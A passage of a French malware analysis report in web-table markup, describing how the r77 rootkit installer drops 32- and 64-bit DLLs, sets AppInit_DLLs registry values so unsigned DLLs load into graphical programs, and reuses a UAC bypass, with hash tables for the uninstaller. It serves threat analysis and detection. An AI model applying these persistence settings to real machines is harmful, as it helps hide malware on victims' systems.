class=\"td_class_97969899\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97969899\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61574672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61574672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61574672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24576:fBm2D0GlV7LJMLMVSBsalgydd4jnYnyeiRyi5+fEilGQ8Joz078UfJeOYyF42fQo:Q2D0mV76LMV1algAkYPY+78J04r4zzW<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]L'installateur de r77 est obtenu une fois le fichier rt.jpg, pr\u00e9sent sur le d\u00e9p\u00f4t, d\u00e9cod\u00e9.<\/p>\n<h5>Pr\u00e9sentation<\/h5>\n<p>L'installation du rootkit est simple, le binaire contient dans ses ressources deux fichiers DLL\u00a0: un 32\u00a0bits et un 64\u00a0bits. Le fichier DLL correspondant \u00e0 la version du syst\u00e8me d'exploitation cibl\u00e9 (64 ou 32 bits) est r\u00e9cup\u00e9r\u00e9 dans les ressources\u00a0; puis copi\u00e9 dans le r\u00e9pertoire <code>%APPDATA%<\/code>.<\/p>\n<p>La suite de sa mise en place consiste \u00e0 r\u00e9f\u00e9rencer ces fichiers dans la cl\u00e9 de registre ad\u00e9quate et d'en modifier deux autres\u00a0:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_3\"\n     id='ninja_table_builder_414275'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_3\"\n     style=\"\n     max-height:500px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414275\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_3013210\" class=\"desktop-view tr_class_3013210 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_64919134\" rowspan=\"1\" colspan=\"1\" class=\"td_class_64919134\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_64919134\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Register value<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66741514\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66741514\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66741514\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Description<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9153992\" class=\"desktop-view tr_class_9153992 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_66537471\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66537471\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66537471\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWindowsLoadAppInit_DLLs<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_52080670\" rowspan=\"1\" colspan=\"1\" class=\"td_class_52080670\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_52080670\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Value set to 1, enables the AppInit_DLLs mechanism<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_4799115\" class=\"desktop-view tr_class_4799115 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_42734462\" rowspan=\"1\" colspan=\"1\" class=\"td_class_42734462\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_42734462\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWindowsRequireSignedAppInit_DLLs<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_65481876\" rowspan=\"1\" colspan=\"1\" class=\"td_class_65481876\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_65481876\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Value set to 0 to load unsigned DLLs<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5516345\" class=\"desktop-view tr_class_5516345 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_71884887\" rowspan=\"1\" colspan=\"1\" class=\"td_class_71884887\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_71884887\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWindowsAppInit_DLLs<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_30314745\" rowspan=\"1\" colspan=\"1\" class=\"td_class_30314745\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_30314745\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Contains the path to the DLL to be loaded (r77-x64.dll or r77-x86.dll)<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Le chargement de ces DLLS malveillantes est r\u00e9alis\u00e9 automatiquement par user32.dll et, par cons\u00e9quent, par chaque programme qui l'utilise. C'est \u00e0 dire la plupart des programmes disposant d'une interface graphique.<\/p>\n<p>La documentation pr\u00e9cise qu'\u00e0 partir de Windows 8, le m\u00e9canisme AppInit_DLLs est d\u00e9sactiv\u00e9 lorsque la fonctionnalit\u00e9 Secure Boot est activ\u00e9e, ce qui r\u00e9duit le nombre de cibles potentielles.<\/p>\n<p>Plus d'infos sur le m\u00e9canisme d'AppInit_DLLs sont \u00e0 retrouver sur <a href=\"https:\/\/learn.microsoft.com\/fr-fr\/windows\/win32\/win7appqual\/appinit-dlls-in-windows-7-and-windows-server-2008-r2\" target=\"_blank\" rel=\"noopener\">le site de Microsoft<\/a>, dont voici un extrait\u00a0: \u00ab\u00a0<em>AppInit_DLLs est un m\u00e9canisme qui permet de charger une liste arbitraire de DLL dans chaque processus en mode utilisateur sur le syst\u00e8me. Microsoft modifie l\u2019installation des DLL AppInit dans Windows 7 et Windows Server 2008 R2 pour ajouter une nouvelle exigence de signature de code. Cela aidera \u00e0 am\u00e9liorer la fiabilit\u00e9 et les performances du syst\u00e8me, ainsi qu\u2019\u00e0 am\u00e9liorer la visibilit\u00e9 sur l\u2019origine du logiciel<\/em>\u00a0\u00bb.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414132\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 17 : code de l'installation du rootkit r77<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]La modification de ces cl\u00e9s n\u00e9cessitant des privil\u00e8ges administrateur, la technique de contournement d'UAC vue pr\u00e9c\u00e9demment (<em>voir la partie \u00ab\u00a0Dropper de HiddenEyeZ HVNC \u00bb<\/em>) est r\u00e9utilis\u00e9e dans ce binaire.<\/p>\n<h4>D\u00e9sinstalleur de r77<\/h4>\n<h5>Carte d'identit\u00e9<\/h5>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_4\"\n     id='ninja_table_builder_414273'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_4\"\n     style=\"\n     max-height:900px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414273\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_47180689\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_63752073\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63752073\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63752073\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_85508872\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85508872\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85508872\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_67647307\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67647307\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67647307\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">.NET<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_88081221\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88081221\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_88081221\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_23319849\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23319849\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23319849\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Thu Dec 6 16:06:38 2040 | Incoherent<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_90964305\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90964305\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90964305\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85405762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85405762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85405762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">No<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22731821\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22731821\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22731821\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27089268\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27089268\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27089268\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">d406a1906ed519562f2524a03bf2ff40<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_74398198\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74398198\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74398198\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81484118\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81484118\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81484118\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">38b73304bfaf8db51b63946cd4ab29fa48c15816<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_36997657\" rowspan=\"1\" colspan=\"1\" class=\"td_class_36997657\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_36997657\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66951413\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66951413\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66951413\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">6c1b2c9ae4887ff134bd098cab3e6c5ada1482f45a129ccc858733a545a10619<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_97969899\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97969899\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97969899\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61574672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61574672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61574672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">192:\/MxThhi8bE8yM8MlrljlQ0ljgcR\/ytyLabWW:\/4fi8bE8yM8UR\/lLabW<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i 